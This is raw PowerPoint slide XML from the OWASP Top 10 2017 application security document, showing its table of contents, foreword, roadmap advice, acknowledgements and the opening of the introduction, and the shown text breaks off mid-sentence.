                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Arial" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>Application Security Risks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1" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>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2808000" algn="r"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Arial" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>	T10	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>- OWASP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Arial" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>Top 10 Application Security</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Arial" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Arial" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>		</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Arial" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>- </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Arial" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>Risks – 2017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2" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>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A1:2017	- Injection	….</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Arial" charset="0"/>
                          <a:cs typeface="Arial"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3" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>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A2:2017	- Broken Authentication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4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>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A3:2017	- Sensitive Data Exposure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5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>10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A4:2017	- XML External Entities (XXE)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6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>11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A5:2017	- Broken Access Control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7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>12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A6:2017	- Security Misconfiguration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8" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>13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A7:2017	- Cross-Site Scripting (XSS)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19" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>14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A8:2017	- Insecure Deserialization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0" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>15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A9:2017	- Using Components with Known</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>		</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>- </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Vulnerabilities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1" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>16</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A10:2017	- Insufficient Logging &amp; Monitoring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2" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>17</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+D	- What’s Next for Developers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3" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>18</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+T	- What’s Next for Security Testing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4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>19</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+O	- What’s Next for Organizations…….……..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5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>20</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	- What’s Next for Application Managers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6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>21</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	- Note About Risks………………………….</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7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>22</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+RF	- Details About Risk Factors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8" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>23</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Dat</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>	- Methodology and Data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29" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>24</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a:tabLst>
                          <a:tab pos="540000" algn="r"/>
                          <a:tab pos="558000" algn="l"/>
                          <a:tab pos="2808000" algn="r"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>	+</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Ack</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>	- Acknowledgements	……………………….</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Arial" charset="0"/>
                          <a:ea typeface="Arial" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                          <a:hlinkClick r:id="rId30" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>25</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Arial" charset="0"/>
                        <a:ea typeface="Arial" charset="0"/>
                        <a:cs typeface="Arial"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ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>FW</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titel 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="76199"/>
            <a:ext cx="5486400" cy="762001"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Foreword</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAD90FCC-E953-489C-88FB-5FEBDDC8B97E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="419100" y="1065213"/>
            <a:ext cx="6027399" cy="7294305"/>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dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>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endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>A great deal of feedback was received during the creation of the OWASP Top 10 2017, more than for any other equivalent OWASP effort. This shows how much passion the community has for the OWASP Top 10, and thus how critical it is for OWASP to get the Top 10 right for the majority of use cases.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Although the original goal of the OWASP Top 10 project was simply to raise awareness amongst developers, it has become </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" i="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> de facto application security standard. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>We have taken steps in this release to firm up the definition of issues, and improve the recommendations to be leading practices that may be adopted as an application security standard that covers off around 80-90% of all common attacks and threats. We encourage large and high performing organizations to use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>OWASP Application Security Verification Standard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> if a true standard is required, but for most, the OWASP Top 10 is a great start on the application security journey.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>We have written up a range of suggested next steps for different users of the OWASP Top 10, including "What's next for developers", "What's next for testers", "What's next for organizations" which is suitable for CIO's and CISO's, "What's next for application managers", which is suitable for application owners.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>In the long term, we encourage all software development teams and organizations to create an application security program that is compatible with your culture and technology. These programs come in all shapes and sizes. Leverage your organization's existing strengths to do and measure what works for you.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>We hope that the OWASP Top 10 is useful to your application security efforts. Please don't hesitate to contact OWASP with your questions, comments, and ideas at our GitHub project repository:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://github.com/OWASP/Top10/issues</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="121920"/>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1270"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>You can find OWASP Top 10 project and translations here:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1270"/>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/top10</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1270"/>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Lastly, we wish to thank the founding leadership of the OWASP Top 10 project, Dave Wichers and Jeff Williams for all their efforts, and believing in us to get this finished with the community's help. Thank you!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="121920"/>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Torsten Gigler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Brian Glas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Neil Smithline</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Andrew van der Stock</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>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92320109"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="3810000"/>
          <a:ext cx="3352800" cy="5333999"/>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40139">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0"/>
                        <a:t>Roadmap for future activities</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" kern="1200" dirty="0"/>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dirty="0">
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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Don't stop at 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>. There are hundreds of issues that could affect the overall security of a web application as discussed in the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP Developer's Guide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> and the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>OWASP Cheat Sheet Series</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>. These are essential reading for anyone developing web applications and APIs. Guidance on how to effectively find vulnerabilities in web applications and APIs is provided in the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>OWASP Testing Guide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>.</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Constant</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> change</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>. The OWASP Top 10 will continue to change. Even without changing a single line of your application's code, you may become vulnerable as new flaws are discovered and attack methods are refined. Please review the advice at the end of the Top 10 in “What's Next For Developers, Testers, and Organizations” for more information.</a:t>
                      </a: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baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Think positive</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>When you're ready to stop chasing vulnerabilities and focus on establishing strong application security controls, OWASP is maintaining and promoting the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>OWASP Application Security Verification Standard (ASVS)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> as a guide to organizations and application reviewers on what to verify.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" baseline="0" dirty="0">
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Use tools wisely</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>. Security vulnerabilities can be quite complex and deeply buried in code. In many cases, the most cost-effective approach for finding and eliminating these weaknesses is human experts armed with good tools.</a:t>
                      </a:r>
                    </a:p>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a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Push left, right, and everywhere</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>. Focus on making security an integral part of your culture throughout your development organization. Find out more in the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>OWASP Software Assurance Maturity Model (SAMM)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>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923179548"/>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5276">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
                        <a:t>Attribution</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latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="just">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>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yet collected publicly. </a:t>
                      </a:r>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As there are more contributors than space here, we have created a dedicated page to recognize the contributions made. We wish to give heartfelt thanks to these organizations for being willing to be on the front lines of publicly sharing vulnerability data from their efforts. We hope this will continue to grow and encourage more organizations to do the same and possibly be seen as one of the key milestones of evidence based security. The OWASP Top 10 would not be possible without these amazing contributions. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="just">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="just">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>A big thank you to the 516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p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>We would like to thank in advance those individuals who contribute significant constructive comments and time reviewing this update to the Top 10. As much as possible, we have listed them on the attribution page ‘+Ack’. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>And finally, we'd like to thank in advance all the translators out there that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t>Introduction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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2010377902"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="27432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281598">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Welcome</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> to the OWASP Top 10 2017! </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>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407920">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>This major update adds several new issues, including two issues selected by the community - </a:t>
                      </a:r>
                      <a:r>
